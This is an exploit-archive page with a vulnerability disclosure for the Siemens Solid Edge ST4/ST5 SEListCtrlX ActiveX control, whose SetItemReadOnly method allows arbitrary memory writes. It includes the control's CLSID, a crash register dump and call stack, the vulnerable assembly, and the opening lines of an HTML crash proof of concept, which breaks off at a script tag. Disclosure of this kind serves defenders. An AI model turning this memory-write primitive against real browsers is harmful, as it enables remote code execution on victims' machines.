[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE
# Published : 2013-05-26
# Author :
# Previous Title : CodeBlocks 12.11 (Mac OS X) - Crash POC
# Next Title : Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow

SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly  
Arbitrary Memory Rewrite Remote Code Execution Vulnerability

tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft Windows XP sp3
                Microsoft Windows 7
                Internet Explorer 7/8

software description: http://en.wikipedia.org/wiki/Solid_Edge

vendor site: http://www.siemens.com/entry/cc/en/

download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm

file tested: SolidEdgeV104ENGLISH_32Bit.exe


the mentioned software installs an ActiveX control with 
the following settings:

ActiveX settings:
CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}
binary path: C:Program FilesSolid Edge ST4ProgramSEListCtrlX.ocx
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True


This control exposes the SetItemReadOnly() method, see typelib:

/* DISPID=14 */
	function SetItemReadOnly(
		/* VT_VARIANT [12]  */ $hItem,
		/* VT_BOOL [11]  */ $bReadOnly 

By setting to a memory address the first argument
and the second one to 'false' you can write a NULL
byte inside an arbitrary memory region.

By setting to a memory address the first argument
and the second one to 'true' you can write a x08
byte inside an arbitrary memory region.

Example crash:

EAX 61616161
ECX 0417AB44
EDX 01B7F530
EBX 0000000C
ESP 01B7F548
EBP 01B7F548
ESI 0417A930
EDI 027D5DD0 SEListCt.027D5DD0
EIP 033FD158 control.033FD158
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD9000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST1 empty 3.3760355862290856960e-4932
ST2 empty +UNORM 48F4 00000000 00000000
ST3 empty -2.4061003025887744000e+130
ST4 empty -UNORM C198 00000000 00000000
ST5 empty 0.0
ST6 empty 1633771873.0000000000
ST7 empty 1633771873.0000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Call stack of thread 000009B8
Address    Stack      Procedure / arguments                                                             Called from                   Frame
01B7F54C   027D5DF3   control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z                       SEListCt.027D5DED             01B7F548
01B7F560   787FF820   Includes SEListCt.027D5DF3                                                        mfc100u.787FF81E              01B7F55C
01B7F56C   78807BF5   mfc100u.787FF810                                                                  mfc100u.78807BF0              01B7F618
01B7F61C   78808312   ? mfc100u.78807A5B                                                                mfc100u.7880830D              01B7F618

vulnerable code, inside the close control.dll:
  		Align	4
  		push	ebp
  		mov	ebp,esp
  		mov	eax,[ebp+08h]
  		test	eax,eax
  		jz 	L1011D15C
  		cmp	dword ptr [ebp+0Ch],00000000h
  		jz 	L1011D158
  		or	dword ptr [eax+2Ch],00000008h <-------------------- it crashes here
  		pop	ebp
  		retn	0008h

  		and	dword ptr [eax+2Ch],FFFFFFF7h <-------------------- or here           
  		pop	ebp
  		retn	0008h

As attachment, code to reproduce the crash.

<!-- saved from url=(0014)about:internet -->
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
<script language='javascript'>